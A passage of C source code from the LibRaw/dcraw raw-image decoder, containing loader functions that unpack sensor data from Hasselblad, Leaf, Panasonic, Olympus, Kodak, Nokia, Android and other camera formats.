pixel[col] = pred[col & 1] += ph1_bits(i) + 1 - (1 << (i - 1));
if (pred[col & 1] >> 16) derror();
if (ph1.format == 5 && pixel[col] < 256)
pixel[col] = curve[pixel[col]];
}
#ifndef LIBRAW_LIBRARY_BUILD
for (col=0; col < raw_width; col++) {
int shift = ph1.format == 8? 0: 2;
i = (pixel[col] << shift) - ph1.t_black
+ c_black[row][col >= ph1.split_col]
+ r_black[col][row >= ph1.split_row];
if (i > 0) RAW(row,col) = i;
}
#else
if(ph1.format == 8)
memmove(&RAW(row,0),&pixel[0],raw_width*2);
else
for (col=0; col < raw_width; col++)
RAW(row,col) = pixel[col] << 2;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = 0xfffc - ph1.t_black;
}
void CLASS hasselblad_load_raw()
{
struct jhead jh;
int shot, row, col, *back[5], len[2], diff[12], pred, sh, f, s, c;
unsigned upix, urow, ucol;
ushort *ip;
if (!ljpeg_start (&jh, 0)) return;
order = 0x4949;
ph1_bits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
back[4] = (int *) calloc (raw_width, 3*sizeof **back);
merror (back[4], "hasselblad_load_raw()");
FORC3 back[c] = back[4] + c*raw_width;
cblack[6] >>= sh = tiff_samples > 1;
shot = LIM(shot_select, 1, tiff_samples) - 1;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC4 back[(c+3) & 3] = back[c];
for (col=0; col < raw_width; col+=2) {
for (s=0; s < tiff_samples*2; s+=2) {
FORC(2) len[c] = ph1_huff(jh.huff[0]);
FORC(2) {
diff[s+c] = ph1_bits(len[c]);
if ((diff[s+c] & (1 << (len[c]-1))) == 0)
diff[s+c] -= (1 << len[c]) - 1;
if (diff[s+c] == 65535) diff[s+c] = -32768;
}
}
for (s=col; s < col+2; s++) {
pred = 0x8000 + load_flags;
if (col) pred = back[2][s-2];
if (col && row > 1) switch (jh.psv) {
case 11: pred += back[0][s]/2 - back[0][s-2]/2; break;
}
f = (row & 1)*3 ^ ((col+s) & 1);
FORC (tiff_samples) {
pred += diff[(s & 1)*tiff_samples+c];
upix = pred >> sh & 0xffff;
if (raw_image && c == shot)
RAW(row,s) = upix;
if (image) {
urow = row-top_margin + (c & 1);
ucol = col-left_margin - ((c >> 1) & 1);
ip = &image[urow*width+ucol][f];
if (urow < height && ucol < width)
*ip = c < 4 ? upix : (*ip + upix) >> 1;
}
}
back[2][s] = pred;
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (back[4]);
ljpeg_end (&jh);
throw;
}
#endif
free (back[4]);
ljpeg_end (&jh);
if (image) mix_green = 1;
}
void CLASS leaf_hdr_load_raw()
{
ushort *pixel=0;
unsigned tile=0, r, c, row, col;
if (!filters) {
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "leaf_hdr_load_raw()");
}
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
FORC(tiff_samples)
for (r=0; r < raw_height; r++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (r % tile_length == 0) {
fseek (ifp, data_offset + 4*tile++, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
}
if (filters && c != shot_select) continue;
if (filters) pixel = raw_image + r*raw_width;
read_shorts (pixel, raw_width);
if (!filters && (row = r - top_margin) < height)
for (col=0; col < width; col++)
image[row*width+col][c] = pixel[col+left_margin];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
if(!filters) free(pixel);
throw;
}
#endif
if (!filters) {
maximum = 0xffff;
raw_color = 1;
free (pixel);
}
}
void CLASS unpacked_load_raw()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
read_shorts (raw_image, raw_width*raw_height);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS unpacked_load_raw_reversed()
{
int row, col, bits=0;
while (1 << ++bits < maximum);
for (row=raw_height-1; row >= 0; row--)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
read_shorts (&raw_image[row*raw_width], raw_width);
for (col=0; col < raw_width; col++)
if ((RAW(row,col) >>= load_flags) >> bits
&& (unsigned) (row-top_margin) < height
&& (unsigned) (col-left_margin) < width) derror();
}
}
void CLASS sinar_4shot_load_raw()
{
ushort *pixel;
unsigned shot, row, col, r, c;
if (raw_image) {
shot = LIM (shot_select, 1, 4) - 1;
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
unpacked_load_raw();
return;
}
#ifdef LIBRAW_LIBRARY_BUILD
else if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
pixel = (ushort *) calloc (raw_width, sizeof *pixel);
merror (pixel, "sinar_4shot_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (shot=0; shot < 4; shot++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, data_offset + shot*4, SEEK_SET);
fseek (ifp, get4(), SEEK_SET);
for (row=0; row < raw_height; row++) {
read_shorts (pixel, raw_width);
if ((r = row-top_margin - (shot >> 1 & 1)) >= height) continue;
for (col=0; col < raw_width; col++) {
if ((c = col-left_margin - (shot & 1)) >= width) continue;
image[r*width+c][(row & 1)*3 ^ (~col & 1)] = pixel[col];
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free(pixel);
throw;
}
#endif
free (pixel);
mix_green = 1;
}
void CLASS imacon_full_load_raw()
{
int row, col;
if (!image) return;
#ifdef LIBRAW_LIBRARY_BUILD
unsigned short *buf = (unsigned short *)malloc(width*3*sizeof(unsigned short));
merror(buf,"imacon_full_load_raw");
#endif
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
read_shorts(buf,width*3);
unsigned short (*rowp)[4] = &image[row*width];
for (col=0; col < width; col++)
{
rowp[col][0]=buf[col*3];
rowp[col][1]=buf[col*3+1];
rowp[col][2]=buf[col*3+2];
rowp[col][3]=0;
}
#else
for (col=0; col < width; col++)
read_shorts (image[row*width+col], 3);
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(buf);
#endif
}
void CLASS packed_load_raw()
{
int vbits=0, bwide, rbits, bite, half, irow, row, col, val, i;
UINT64 bitbuf=0;
bwide = raw_width * tiff_bps / 8;
bwide += bwide & load_flags >> 7;
rbits = bwide * 8 - raw_width * tiff_bps;
if (load_flags & 1) bwide = bwide * 16 / 15;
bite = 8 + (load_flags & 24);
half = (raw_height+1) >> 1;
for (irow=0; irow < raw_height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
row = irow;
if (load_flags & 2 &&
(row = irow % half * 2 + irow / half) == 1 &&
load_flags & 4) {
if (vbits=0, tiff_compress)
fseek (ifp, data_offset - (-half*bwide & -2048), SEEK_SET);
else {
fseek (ifp, 0, SEEK_END);
fseek (ifp, ftell(ifp) >> 3 << 2, SEEK_SET);
}
}
if(feof(ifp)) throw LIBRAW_EXCEPTION_IO_EOF;
for (col=0; col < raw_width; col++) {
for (vbits -= tiff_bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
val = bitbuf << (64-tiff_bps-vbits) >> (64-tiff_bps);
RAW(row,col ^ (load_flags >> 6 & 1)) = val;
if (load_flags & 1 && (col % 10) == 9 && fgetc(ifp) &&
row < height+top_margin && col < width+left_margin) derror();
}
vbits -= rbits;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
ushort raw_stride;
void CLASS parse_broadcom () {
/* This structure is at offset 0xb0 from the 'BRCM' ident. */
struct {
uint8_t umode[32];
uint16_t uwidth;
uint16_t uheight;
uint16_t padding_right;
uint16_t padding_down;
uint32_t unknown_block[6];
uint16_t transform;
uint16_t format;
uint8_t bayer_order;
uint8_t bayer_format;
} header;
header.bayer_order = 0;
fseek (ifp, 0xb0 - 0x20, SEEK_CUR);
fread (&header, 1, sizeof(header), ifp);
raw_stride = ((((((header.uwidth + header.padding_right)*5)+3)>>2) + 0x1f)&(~0x1f));
raw_width = width = header.uwidth;
raw_height = height = header.uheight;
filters = 0x16161616; /* default Bayer order is 2, BGGR */
switch (header.bayer_order) {
case 0: /* RGGB */
filters = 0x94949494;
break;
case 1: /* GBRG */
filters = 0x49494949;
break;
case 3: /* GRBG */
filters = 0x61616161;
break;
}
}
void CLASS broadcom_load_raw() {
uchar *data, *dp;
int rev, row, col, c;
rev = 3 * (order == 0x4949);
data = (uchar *) malloc (raw_stride*2);
merror (data, "broadcom_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data+raw_stride, 1, raw_stride, ifp) < raw_stride) derror();
FORC(raw_stride) data[c] = data[raw_stride+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
#endif
void CLASS nokia_load_raw()
{
uchar *data, *dp;
int rev, dwide, row, col, c;
double sum[]={0,0};
rev = 3 * (order == 0x4949);
dwide = (raw_width * 5 + 1) / 4;
data = (uchar *) malloc (dwide*2);
merror (data, "nokia_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data+dwide, 1, dwide, ifp) < dwide) derror();
FORC(dwide) data[c] = data[dwide+(c ^ rev)];
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...){
free (data);
throw;
}
#endif
free (data);
maximum = 0x3ff;
if (strncmp(make,"OmniVision",10)) return;
row = raw_height/2;
FORC(width-1) {
sum[ c & 1] += SQR(RAW(row,c)-RAW(row+1,c+1));
sum[~c & 1] += SQR(RAW(row+1,c)-RAW(row,c+1));
}
if (sum[1] > sum[0]) filters = 0x4b4b4b4b;
}
void CLASS android_tight_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
bwide = -(-5*raw_width >> 5) << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_tight_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=5, col+=4)
FORC4 RAW(row,col+c) = (dp[c] << 2) | (dp[4] >> (c << 1) & 3);
}
free (data);
}
void CLASS android_loose_load_raw()
{
uchar *data, *dp;
int bwide, row, col, c;
UINT64 bitbuf=0;
bwide = (raw_width+5)/6 << 3;
data = (uchar *) malloc (bwide);
merror (data, "android_loose_load_raw()");
for (row=0; row < raw_height; row++) {
if (fread (data, 1, bwide, ifp) < bwide) derror();
for (dp=data, col=0; col < raw_width; dp+=8, col+=6) {
FORC(8) bitbuf = (bitbuf << 8) | dp[c^7];
FORC(6) RAW(row,col+c) = (bitbuf >> c*10) & 0x3ff;
}
}
free (data);
}
void CLASS canon_rmf_load_raw()
{
int row, col, bits, orow, ocol, c;
#ifdef LIBRAW_LIBRARY_BUILD
int *words = (int*)malloc(sizeof(int)*(raw_width/3+1));
merror(words,"canon_rmf_load_raw");
#endif
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
fread(words,sizeof(int),raw_width/3,ifp);
for (col=0; col < raw_width-2; col+=3)
{
bits = words[col/3];
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0)
{
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#else
for (col=0; col < raw_width-2; col+=3) {
bits = get4();
FORC3 {
orow = row;
if ((ocol = col+c-4) < 0) {
ocol += raw_width;
if ((orow -= 2) < 0)
orow += raw_height;
}
RAW(orow,ocol) = curve[bits >> (10*c+2) & 0x3ff];
}
}
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
free(words);
#endif
maximum = curve[0x3ff];
}
unsigned CLASS pana_bits (int nbits)
{
#ifndef LIBRAW_NOTHREADS
#define buf tls->pana_bits.buf
#define vbits tls->pana_bits.vbits
#else
static uchar buf[0x4000];
static int vbits;
#endif
int byte;
if (!nbits) return vbits=0;
if (!vbits) {
fread (buf+load_flags, 1, 0x4000-load_flags, ifp);
fread (buf, 1, load_flags, ifp);
}
vbits = (vbits - nbits) & 0x1ffff;
byte = vbits >> 3 ^ 0x3ff0;
return (buf[byte] | buf[byte+1] << 8) >> (vbits & 7) & ~((~0u) << nbits);
#ifndef LIBRAW_NOTHREADS
#undef buf
#undef vbits
#endif
}
void CLASS panasonic_load_raw()
{
int row, col, i, j, sh=0, pred[2], nonz[2];
pana_bits(0);
for (row = 0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if ((i = col % 14) == 0)
pred[0] = pred[1] = nonz[0] = nonz[1] = 0;
if (i % 3 == 2) sh = 4 >> (3 - pana_bits(2));
if (nonz[i & 1]) {
if ((j = pana_bits(8))) {
if ((pred[i & 1] -= 0x80 << sh) < 0 || sh == 4)
pred[i & 1] &= ~((~0u) << sh);
pred[i & 1] += j << sh;
}
}
else if ((nonz[i & 1] = pana_bits(8)) || i > 11)
pred[i & 1] = nonz[i & 1] << 4 | pana_bits(4);
if ((RAW(row, col) = pred[col & 1]) > 4098 && col < width && row < height)
derror();
}
}
}
void CLASS olympus_load_raw()
{
ushort huff[4096];
int row, col, nbits, sign, low, high, i, c, w, n, nw;
int acarry[2][3], *carry, pred, diff;
huff[n=0] = 0xc0c;
for (i=12; i--; )
FORC(2048 >> i) huff[++n] = (i+1) << 8 | i;
fseek (ifp, 7, SEEK_CUR);
getbits(-1);
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
memset (acarry, 0, sizeof acarry);
for (col=0; col < raw_width; col++) {
carry = acarry[col & 1];
i = 2 * (carry[2] < 3);
for (nbits=2+i; (ushort) carry[0] >> (nbits+i); nbits++);
low = (sign = getbits(3)) & 3;
sign = sign << 29 >> 31;
if ((high = getbithuff(12,huff)) == 12)
high = getbits(16-nbits) >> 1;
carry[0] = (high << nbits) | getbits(nbits);
diff = (carry[0] ^ sign) + carry[1];
carry[1] = (diff*3 + carry[1]) >> 5;
carry[2] = carry[0] > 16 ? 0 : carry[2]+1;
if (col >= width) continue;
if (row < 2 && col < 2) pred = 0;
else if (row < 2) pred = RAW(row,col-2);
else if (col < 2) pred = RAW(row-2,col);
else {
w = RAW(row,col-2);
n = RAW(row-2,col);
nw = RAW(row-2,col-2);
if ((w < nw && nw < n) || (n < nw && nw < w)) {
if (ABS(w-nw) > 32 || ABS(n-nw) > 32)
pred = w + n - nw;
else pred = (w + n) >> 1;
} else pred = ABS(w-nw) > ABS(n-nw) ? w : n;
}
if ((RAW(row,col) = pred + ((diff << 2) | low)) >> 12) derror();
}
}
}
void CLASS minolta_rd175_load_raw()
{
uchar pixel[768];
unsigned irow, box, row, col;
for (irow=0; irow < 1481; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 768, ifp) < 768) derror();
box = irow / 82;
row = irow % 82 * 12 + ((box < 12) ? box | 1 : (box-12)*2);
switch (irow) {
case 1477: case 1479: continue;
case 1476: row = 984; break;
case 1480: row = 985; break;
case 1478: row = 985; box = 1;
}
if ((box < 12) && (box & 1)) {
for (col=0; col < 1533; col++, row ^= 1)
if (col != 1) RAW(row,col) = (col+1) & 2 ?
pixel[col/2-1] + pixel[col/2+1] : pixel[col/2] << 1;
RAW(row,1) = pixel[1] << 1;
RAW(row,1533) = pixel[765] << 1;
} else
for (col=row & 1; col < 1534; col+=2)
RAW(row,col) = pixel[col/2] << 1;
}
maximum = 0xff << 1;
}
void CLASS quicktake_100_load_raw()
{
uchar pixel[484][644];
static const short gstep[16] =
{ -89,-60,-44,-32,-22,-15,-8,-2,2,8,15,22,32,44,60,89 };
static const short rstep[6][4] =
{ { -3,-1,1,3 }, { -5,-1,1,5 }, { -8,-2,2,8 },
{ -13,-3,3,13 }, { -19,-4,4,19 }, { -28,-6,6,28 } };
static const short t_curve[256] =
{ 0,1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,
28,29,30,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,53,
54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,74,75,76,77,78,
79,80,81,82,83,84,86,88,90,92,94,97,99,101,103,105,107,110,112,114,116,
118,120,123,125,127,129,131,134,136,138,140,142,144,147,149,151,153,155,
158,160,162,164,166,168,171,173,175,177,179,181,184,186,188,190,192,195,
197,199,201,203,205,208,210,212,214,216,218,221,223,226,230,235,239,244,
248,252,257,261,265,270,274,278,283,287,291,296,300,305,309,313,318,322,
326,331,335,339,344,348,352,357,361,365,370,374,379,383,387,392,396,400,
405,409,413,418,422,426,431,435,440,444,448,453,457,461,466,470,474,479,
483,487,492,496,500,508,519,531,542,553,564,575,587,598,609,620,631,643,
654,665,676,687,698,710,721,732,743,754,766,777,788,799,810,822,833,844,
855,866,878,889,900,911,922,933,945,956,967,978,989,1001,1012,1023 };
int rb, row, col, sharp, val=0;
#ifdef LIBRAW_LIBRARY_BUILD
if(width>640 || height > 480)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
getbits(-1);
memset (pixel, 0x80, sizeof pixel);
for (row=2; row < height+2; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=2+(row & 1); col < width+2; col+=2) {
val = ((pixel[row-1][col-1] + 2*pixel[row-1][col+1] +
pixel[row][col-2]) >> 2) + gstep[getbits(4)];
pixel[row][col] = val = LIM(val,0,255);
if (col < 4)
pixel[row][col-2] = pixel[row+1][~row & 1] = val;
if (row == 2)
pixel[row-1][col+1] = pixel[row-1][col+3] = val;
}
pixel[row][col] = val;
}
for (rb=0; rb < 2; rb++)
for (row=2+rb; row < height+2; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
if (row < 4 || col < 4) sharp = 2;
else {
val = ABS(pixel[row-2][col] - pixel[row][col-2])
+ ABS(pixel[row-2][col] - pixel[row-2][col-2])
+ ABS(pixel[row][col-2] - pixel[row-2][col-2]);
sharp = val < 4 ? 0 : val < 8 ? 1 : val < 16 ? 2 :
val < 32 ? 3 : val < 48 ? 4 : 5;
}
val = ((pixel[row-2][col] + pixel[row][col-2]) >> 1)
+ rstep[sharp][getbits(2)];
pixel[row][col] = val = LIM(val,0,255);
if (row < 4) pixel[row-2][col+2] = val;
if (col < 4) pixel[row+2][col-2] = val;
}
}
for (row=2; row < height+2; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=3-(row & 1); col < width+2; col+=2) {
val = ((pixel[row][col-1] + (pixel[row][col] << 2) +
pixel[row][col+1]) >> 1) - 0x100;
pixel[row][col] = LIM(val,0,255);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = t_curve[pixel[row+2][col+2]];
}
maximum = 0x3ff;
}
#define radc_token(tree) ((signed char) getbithuff(8,huff[tree]))
#define FORYX for (y=1; y < 3; y++) for (x=col+1; x >= col; x--)
#define PREDICTOR (c ? (buf[c][y-1][x] + buf[c][y][x+1]) / 2 \
: (buf[c][y-1][x+1] + 2*buf[c][y-1][x] + buf[c][y][x+1]) / 4)
#ifdef __GNUC__
# if __GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 8)
# pragma GCC optimize("no-aggressive-loop-optimizations")
# endif
#endif
void CLASS kodak_radc_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
// All kodak radc images are 768x512
if(width>768 || raw_width>768 || height > 512 || raw_height>512 )
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
static const signed char src[] = {
1,1, 2,3, 3,4, 4,2, 5,7, 6,5, 7,6, 7,8,
1,0, 2,1, 3,3, 4,4, 5,2, 6,7, 7,6, 8,5, 8,8,
2,1, 2,3, 3,0, 3,2, 3,4, 4,6, 5,5, 6,7, 6,8,
2,0, 2,1, 2,3, 3,2, 4,4, 5,6, 6,7, 7,5, 7,8,
2,1, 2,4, 3,0, 3,2, 3,3, 4,7, 5,5, 6,6, 6,8,
2,3, 3,1, 3,2, 3,4, 3,5, 3,6, 4,7, 5,0, 5,8,
2,3, 2,6, 3,0, 3,1, 4,4, 4,5, 4,7, 5,2, 5,8,
2,4, 2,7, 3,3, 3,6, 4,1, 4,2, 4,5, 5,0, 5,8,
2,6, 3,1, 3,3, 3,5, 3,7, 3,8, 4,0, 5,2, 5,4,
2,0, 2,1, 3,2, 3,3, 4,4, 4,5, 5,6, 5,7, 4,8,
1,0, 2,2, 2,-2,
1,-3, 1,3,
2,-17, 2,-5, 2,5, 2,17,
2,-7, 2,2, 2,9, 2,18,
2,-18, 2,-9, 2,-2, 2,7,
2,-28, 2,28, 3,-49, 3,-9, 3,9, 4,49, 5,-79, 5,79,
2,-1, 2,13, 2,26, 3,39, 4,-16, 5,55, 6,-37, 6,76,
2,-26, 2,-13, 2,1, 3,-39, 4,16, 5,-55, 6,-76, 6,37
};
ushort huff[19][256];
int row, col, tree, nreps, rep, step, i, c, s, r, x, y, val;
short last[3] = { 16,16,16 }, mul[3], buf[3][3][386];
static const ushort pt[] =
{ 0,0, 1280,1344, 2320,3616, 3328,8000, 4095,16383, 65535,16383 };
for (i=2; i < 12; i+=2)
for (c=pt[i-2]; c <= pt[i]; c++)
curve[c] = (float)
(c-pt[i-2]) / (pt[i]-pt[i-2]) * (pt[i+1]-pt[i-1]) + pt[i-1] + 0.5;
for (s=i=0; i < sizeof src; i+=2)
FORC(256 >> src[i])
((ushort *)huff)[s++] = src[i] << 8 | (uchar) src[i+1];
s = kodak_cbpp == 243 ? 2 : 3;
FORC(256) huff[18][c] = (8-s) << 8 | c >> s << s | 1 << (s-1);
getbits(-1);
for (i=0; i < sizeof(buf)/sizeof(short); i++)
((short *)buf)[i] = 2048;
for (row=0; row < height; row+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
FORC3 mul[c] = getbits(6);
#ifdef LIBRAW_LIBRARY_BUILD
if(!mul[0] || !mul[1] || !mul[2])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
FORC3 {
val = ((0x1000000/last[c] + 0x7ff) >> 12) * mul[c];
s = val > 65564 ? 10:12;
x = ~((~0u) << (s-1));
val <<= 12-s;
for (i=0; i < sizeof(buf[0])/sizeof(short); i++)
((short *)buf[c])[i] = (((short *)buf[c])[i] * val + x) >> s;
last[c] = mul[c];
for (r=0; r <= !c; r++) {
buf[c][1][width/2] = buf[c][2][width/2] = mul[c] << 7;
for (tree=1, col=width/2; col > 0; ) {
if ((tree = radc_token(tree))) {
col -= 2;
if (tree == 8)
FORYX buf[c][y][x] = (uchar) radc_token(18) * mul[c];
else
FORYX buf[c][y][x] = radc_token(tree+10) * 16 + PREDICTOR;
} else
do {
nreps = (col > 2) ? radc_token(9) + 1 : 1;
for (rep=0; rep < 8 && rep < nreps && col > 0; rep++) {
col -= 2;
if(col>=0)
FORYX buf[c][y][x] = PREDICTOR;
if (rep & 1) {
step = radc_token(10) << 4;
FORYX buf[c][y][x] += step;
}
}
} while (nreps == 9);
}
for (y=0; y < 2; y++)
for (x=0; x < width/2; x++) {
val = (buf[c][y+1][x] << 4) / mul[c];
if (val < 0) val = 0;
if (c) RAW(row+y*2+c-1,x*2+2-c) = val;
else RAW(row+r*2+y,x*2+y) = val;
}
memcpy (buf[c][0]+!c, buf[c][2], sizeof buf[c][0]-2*!c);
}
}
for (y=row; y < row+4; y++)
for (x=0; x < width; x++)
if ((x+y) & 1) {
r = x ? x-1 : x+1;
s = x+1 < width ? x+1 : x-1;
val = (RAW(y,x)-2048)*2 + (RAW(y,r)+RAW(y,s))/2;
if (val < 0) val = 0;
RAW(y,x) = val;
}
}
for (i=0; i < height*width; i++)
raw_image[i] = curve[raw_image[i]];
maximum = 0x3fff;
}
#undef FORYX
#undef PREDICTOR
#ifdef NO_JPEG
void CLASS kodak_jpeg_load_raw() {}
void CLASS lossy_dng_load_raw() {}
#else
#ifndef LIBRAW_LIBRARY_BUILD
METHODDEF(boolean)
fill_input_buffer (j_decompress_ptr cinfo)
{
static uchar jpeg_buffer[4096];
size_t nbytes;
nbytes = fread (jpeg_buffer, 1, 4096, ifp);
swab (jpeg_buffer, jpeg_buffer, nbytes);
cinfo->src->next_input_byte = jpeg_buffer;
cinfo->src->bytes_in_buffer = nbytes;
return TRUE;
}
void CLASS kodak_jpeg_load_raw()
{
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
int row, col;
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
jpeg_stdio_src (&cinfo, ifp);
cinfo.src->fill_input_buffer = fill_input_buffer;
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 )) {
fprintf (stderr,_("%s: incorrect JPEG dimensions\n"), ifname);
jpeg_destroy_decompress (&cinfo);
longjmp (failure, 3);
}
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, width*3, 1);
while (cinfo.output_scanline < cinfo.output_height) {
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
maximum = 0xff << 1;
}
#else
struct jpegErrorManager {
struct jpeg_error_mgr pub;
};
static void jpegErrorExit (j_common_ptr cinfo)
{
jpegErrorManager* myerr = (jpegErrorManager*) cinfo->err;
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
// LibRaw's Kodak_jpeg_load_raw
void CLASS kodak_jpeg_load_raw()
{
if(data_size < 1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
int row, col;
jpegErrorManager jerr;
struct jpeg_decompress_struct cinfo;
cinfo.err = jpeg_std_error(&jerr.pub);
jerr.pub.error_exit = jpegErrorExit;
unsigned char *jpg_buf = (unsigned char *)malloc(data_size);
merror(jpg_buf,"kodak_jpeg_load_raw");
unsigned char *pixel_buf = (unsigned char*) malloc(width*3);
jpeg_create_decompress (&cinfo);
merror(pixel_buf,"kodak_jpeg_load_raw");
fread(jpg_buf,data_size,1,ifp);
swab ((char*)jpg_buf, (char*)jpg_buf, data_size);
try
{
jpeg_mem_src(&cinfo, jpg_buf, data_size);
int rc = jpeg_read_header(&cinfo, TRUE);
if(rc!=1)
throw LIBRAW_EXCEPTION_DECODE_JPEG;
jpeg_start_decompress (&cinfo);
if ((cinfo.output_width != width ) ||
(cinfo.output_height*2 != height ) ||
(cinfo.output_components != 3 ))
{
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
unsigned char *buf[1];
buf[0] = pixel_buf;
while (cinfo.output_scanline < cinfo.output_height)
{
checkCancel();
row = cinfo.output_scanline * 2;
jpeg_read_scanlines (&cinfo, buf, 1);
unsigned char (*pixel)[3] = (unsigned char (*)[3]) buf[0];
for (col=0; col < width; col+=2) {
RAW(row+0,col+0) = pixel[col+0][1] << 1;
RAW(row+1,col+1) = pixel[col+1][1] << 1;
RAW(row+0,col+1) = pixel[col][0] + pixel[col+1][0];
RAW(row+1,col+0) = pixel[col][2] + pixel[col+1][2];
}
}
}
catch (...)
{
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
throw;
}
jpeg_finish_decompress (&cinfo);
jpeg_destroy_decompress (&cinfo);
free(jpg_buf);
free(pixel_buf);
maximum = 0xff << 1;
}
#endif
#ifndef LIBRAW_LIBRARY_BUILD
void CLASS gamma_curve (double pwr, double ts, int mode, int imax);
#endif
void CLASS lossy_dng_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct jpeg_decompress_struct cinfo;
struct jpeg_error_mgr jerr;
JSAMPARRAY buf;
JSAMPLE (*pixel)[3];
unsigned sorder=order, ntags, opcode, deg, i, j, c;
unsigned save=data_offset-4, trow=0, tcol=0, row, col;
ushort cur[3][256];
double coeff[9], tot;
if (meta_offset) {
fseek (ifp, meta_offset, SEEK_SET);
order = 0x4d4d;
ntags = get4();
while (ntags--) {
opcode = get4(); get4(); get4();
if (opcode != 8)
{ fseek (ifp, get4(), SEEK_CUR); continue; }
